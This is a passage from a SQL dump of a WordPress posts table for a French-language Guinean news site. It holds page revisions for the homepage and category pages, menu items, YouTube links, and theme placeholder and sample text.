06:59:57','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(481,1,'2017-10-25 07:05:58','2017-10-25 07:05:58','\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n			<h3>Populaires</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 07:05:58','2017-10-25 07:05:58','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(482,1,'2017-10-25 07:34:41','2017-10-25 07:34:41','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n			<h3>Derniers articles</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 07:34:41','2017-10-25 07:34:41','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(483,1,'2017-10-25 07:52:00','2017-10-25 07:52:00','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=9uOETcuFjbE		\n			<h3>Derniers articles</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 07:52:00','2017-10-25 07:52:00','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(484,1,'2017-10-25 07:54:05','2017-10-25 07:54:05','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=9uOETcuFjbE		\n			<h3>Derniers articles</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 07:54:05','2017-10-25 07:54:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(485,1,'2017-10-25 08:08:46','2017-10-25 08:08:46','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihs','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:08:46','2017-10-25 08:08:46','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(486,1,'2017-10-25 08:14:06','2017-10-25 08:14:06','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihs','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:14:06','2017-10-25 08:14:06','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(487,1,'2017-10-25 08:22:19','2017-10-25 08:22:19','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihs','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:22:19','2017-10-25 08:22:19','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(488,1,'2017-10-25 08:28:08','2017-10-25 08:28:08','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.be','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:28:08','2017-10-25 08:28:08','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(489,1,'2017-10-25 08:31:11','2017-10-25 08:31:11','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.be','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:31:11','2017-10-25 08:31:11','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(490,1,'2017-10-25 08:32:15','2017-10-25 08:32:15','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:32:15','2017-10-25 08:32:15','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(491,1,'2017-10-25 08:44:59','2017-10-25 08:44:59','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:44:59','2017-10-25 08:44:59','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(492,1,'2017-10-25 08:45:40','2017-10-25 08:45:40','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:45:40','2017-10-25 08:45:40','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(493,1,'2017-10-25 08:49:15','2017-10-25 08:49:15','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:49:15','2017-10-25 08:49:15','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(494,1,'2017-10-25 08:49:49','2017-10-25 08:49:49','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:49:49','2017-10-25 08:49:49','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(495,1,'2017-10-25 08:51:02','2017-10-25 08:51:02','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:51:02','2017-10-25 08:51:02','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(496,1,'2017-10-25 08:51:54','2017-10-25 08:51:54','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:51:54','2017-10-25 08:51:54','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(497,1,'2017-10-25 08:54:14','2017-10-25 08:54:14','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 08:54:14','2017-10-25 08:54:14','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(498,1,'2017-10-25 09:01:25','2017-10-25 09:01:25','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 09:01:25','2017-10-25 09:01:25','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(500,1,'2017-10-25 09:33:28','2017-10-25 09:33:28','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 09:33:28','2017-10-25 09:33:28','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(501,1,'2017-10-25 09:34:29','2017-10-25 09:34:29','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 09:34:29','2017-10-25 09:34:29','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(502,1,'2017-10-25 09:44:05','2017-10-25 09:44:05','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 09:44:05','2017-10-25 09:44:05','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(503,1,'2017-10-25 09:45:48','2017-10-25 09:45:48','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 09:45:48','2017-10-25 09:45:48','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(504,1,'2017-10-25 10:09:02','2017-10-25 10:09:02','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 10:09:02','2017-10-25 10:09:02','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(505,1,'2017-10-25 10:13:01','2017-10-25 10:13:01','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 10:13:01','2017-10-25 10:13:01','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(506,1,'2017-10-25 10:29:07','2017-10-25 10:29:07','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Technologie</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 10:29:07','2017-10-25 10:29:07','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(507,1,'2017-10-25 10:30:53','2017-10-25 10:30:53','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 10:30:53','2017-10-25 10:30:53','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(509,1,'2017-10-25 10:40:23','2017-10-25 10:40:23','<p>[custom-facebook-feed]</p>','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 10:40:23','2017-10-25 10:40:23','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(510,1,'2017-10-25 10:41:48','2017-10-25 10:41:48','<p>[custom-facebook-feed]</p>','AGRICULTURE','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 10:41:48','2017-10-25 10:41:48','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(511,1,'2017-10-25 11:47:30','2017-10-25 11:47:30','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 11:47:30','2017-10-25 11:47:30','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(512,1,'2017-10-25 12:01:00','2017-10-25 12:01:00','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:01:00','2017-10-25 12:01:00','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(513,1,'2017-10-25 12:06:04','2017-10-25 12:06:04','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n							Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://guineeinnove.nimbasolution.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\"\" />\n													John Doe\n													Designer\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:06:04','2017-10-25 12:06:04','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(514,1,'2017-10-25 12:13:31','2017-10-25 12:13:31','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:13:31','2017-10-25 12:13:31','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(515,1,'2017-10-25 12:15:26','2017-10-25 12:15:26','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:15:26','2017-10-25 12:15:26','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(516,1,'2017-10-25 12:16:32','2017-10-25 12:16:32','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:16:32','2017-10-25 12:16:32','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(517,1,'2017-10-25 12:17:21','2017-10-25 12:17:21','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:17:21','2017-10-25 12:17:21','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(518,1,'2017-10-25 12:31:39','2017-10-25 12:31:39','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:31:39','2017-10-25 12:31:39','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(519,1,'2017-10-25 12:32:39','2017-10-25 12:32:39','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:32:39','2017-10-25 12:32:39','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(520,1,'2017-10-25 12:33:25','2017-10-25 12:33:25','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:33:25','2017-10-25 12:33:25','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(522,1,'2017-10-25 12:54:31','2017-10-25 12:54:31','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:54:31','2017-10-25 12:54:31','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(523,1,'2017-10-25 12:56:45','2017-10-25 12:56:45','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','LA UNE','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 12:56:45','2017-10-25 12:56:45','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(525,1,'2017-10-25 13:37:16','2017-10-25 13:37:16','&nbsp;\r\n<h3>Populaires</h3>\r\n<h3>Videos</h3>\r\nhttps://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&amp;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o\r\n<h3>Technologie</h3>\r\n<h3>Agriculture</h3>\r\n<h3>Autres</h3>','ACCUEIL','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 13:37:16','2017-10-25 13:37:16','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(526,1,'2017-10-25 13:38:28','2017-10-25 13:38:28','','Sport','','publish','closed','closed','','culture-2','','','2017-11-01 15:44:33','2017-11-01 15:44:33','',0,'https://guineeinnove.nimbasolution.com/?page_id=526',0,'page','',0),(527,1,'2017-10-25 13:38:28','2017-10-25 13:38:28','','CULTURE','','inherit','closed','closed','','526-revision-v1','','','2017-10-25 13:38:28','2017-10-25 13:38:28','',526,'https://guineeinnove.nimbasolution.com/2017/10/25/526-revision-v1/',0,'revision','',0),(528,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=528',1,'nav_menu_item','',0),(529,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=529',1,'nav_menu_item','',0),(530,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=530',1,'nav_menu_item','',0),(531,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=531',1,'nav_menu_item','',0),(532,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=532',1,'nav_menu_item','',0),(533,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=533',1,'nav_menu_item','',0),(534,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=534',1,'nav_menu_item','',0),(535,1,'2017-10-25 13:38:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-25 13:38:56','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=535',1,'nav_menu_item','',0),(536,1,'2017-10-25 13:45:12','2017-10-25 13:45:12',' ','','','publish','closed','closed','','536','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=536',8,'nav_menu_item','',0),(537,1,'2017-10-25 13:41:37','2017-10-25 13:41:37','','SPORT','','inherit','closed','closed','','526-revision-v1','','','2017-10-25 13:41:37','2017-10-25 13:41:37','',526,'https://guineeinnove.nimbasolution.com/2017/10/25/526-revision-v1/',0,'revision','',0),(538,1,'2017-10-25 13:42:36','2017-10-25 13:42:36','','Plus','','publish','closed','closed','','autres','','','2017-11-01 16:06:03','2017-11-01 16:06:03','',0,'https://guineeinnove.nimbasolution.com/?page_id=538',0,'page','',0),(539,1,'2017-10-25 13:42:36','2017-10-25 13:42:36','','AUTRES','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 13:42:36','2017-10-25 13:42:36','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(543,1,'2017-10-25 13:45:12','2017-10-25 13:45:12',' ','','','publish','closed','closed','','543','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=543',10,'nav_menu_item','',0),(544,1,'2017-10-25 13:45:51','2017-10-25 13:45:51','<iframe src=\"https://maps.google.com/maps?q=London+Eye%2C+London%2C+United+Kingdom&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<p style=\"font-size: 16px; color: #999999;\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.</p>\r\n<p style=\"font-size: 16px; color: #999999;\"><strong>Telephone :</strong> +0028 55 67 67</p>\r\n<p style=\"font-size: 16px; color: #999999;\"><strong>Email :</strong> jennier_aster@yourdomain.com</p>\r\n<p style=\"font-size: 16px; color: #999999;\"><strong>Address :</strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>','Nous Contacter','','inherit','closed','closed','','363-revision-v1','','','2017-10-25 13:45:51','2017-10-25 13:45:51','',363,'https://guineeinnove.nimbasolution.com/2017/10/25/363-revision-v1/',0,'revision','',0),(545,1,'2017-10-25 13:46:15','2017-10-25 13:46:15','&nbsp;\r\n<h3>Populaires</h3>\r\n<h3>Videos</h3>\r\nhttps://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&amp;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o\r\n<h3>Technologie</h3>\r\n<h3>Agriculture</h3>\r\n<h3>Autres</h3>','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-25 13:46:15','2017-10-25 13:46:15','',360,'https://guineeinnove.nimbasolution.com/2017/10/25/360-revision-v1/',0,'revision','',0),(546,1,'2017-10-25 13:46:32','2017-10-25 13:46:32','[custom-facebook-feed]','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-10-25 13:46:32','2017-10-25 13:46:32','',378,'https://guineeinnove.nimbasolution.com/2017/10/25/378-revision-v1/',0,'revision','',0),(547,1,'2017-10-25 13:46:43','2017-10-25 13:46:43','','Autres','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 13:46:43','2017-10-25 13:46:43','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(548,1,'2017-10-25 13:46:54','2017-10-25 13:46:54','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-10-25 13:46:54','2017-10-25 13:46:54','',385,'https://guineeinnove.nimbasolution.com/2017/10/25/385-revision-v1/',0,'revision','',0),(549,1,'2017-10-25 13:47:05','2017-10-25 13:47:05','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-10-25 13:47:05','2017-10-25 13:47:05','',380,'https://guineeinnove.nimbasolution.com/2017/10/25/380-revision-v1/',0,'revision','',0),(550,1,'2017-10-25 13:47:18','2017-10-25 13:47:18','','Santé','','inherit','closed','closed','','383-revision-v1','','','2017-10-25 13:47:18','2017-10-25 13:47:18','',383,'https://guineeinnove.nimbasolution.com/2017/10/25/383-revision-v1/',0,'revision','',0),(551,1,'2017-10-25 13:47:33','2017-10-25 13:47:33','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\r\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\r\n...or something like this:\r\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\r\nAs a new WordPress user, you should go to <a href=\"http://demo7.magzma.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Société','','inherit','closed','closed','','359-revision-v1','','','2017-10-25 13:47:33','2017-10-25 13:47:33','',359,'https://guineeinnove.nimbasolution.com/2017/10/25/359-revision-v1/',0,'revision','',0),(553,1,'2017-10-25 13:47:48','2017-10-25 13:47:48','','Sport','','inherit','closed','closed','','526-revision-v1','','','2017-10-25 13:47:48','2017-10-25 13:47:48','',526,'https://guineeinnove.nimbasolution.com/2017/10/25/526-revision-v1/',0,'revision','',0),(554,1,'2017-10-25 13:48:03','2017-10-25 13:48:03','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 13:48:03','2017-10-25 13:48:03','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(555,1,'2017-10-25 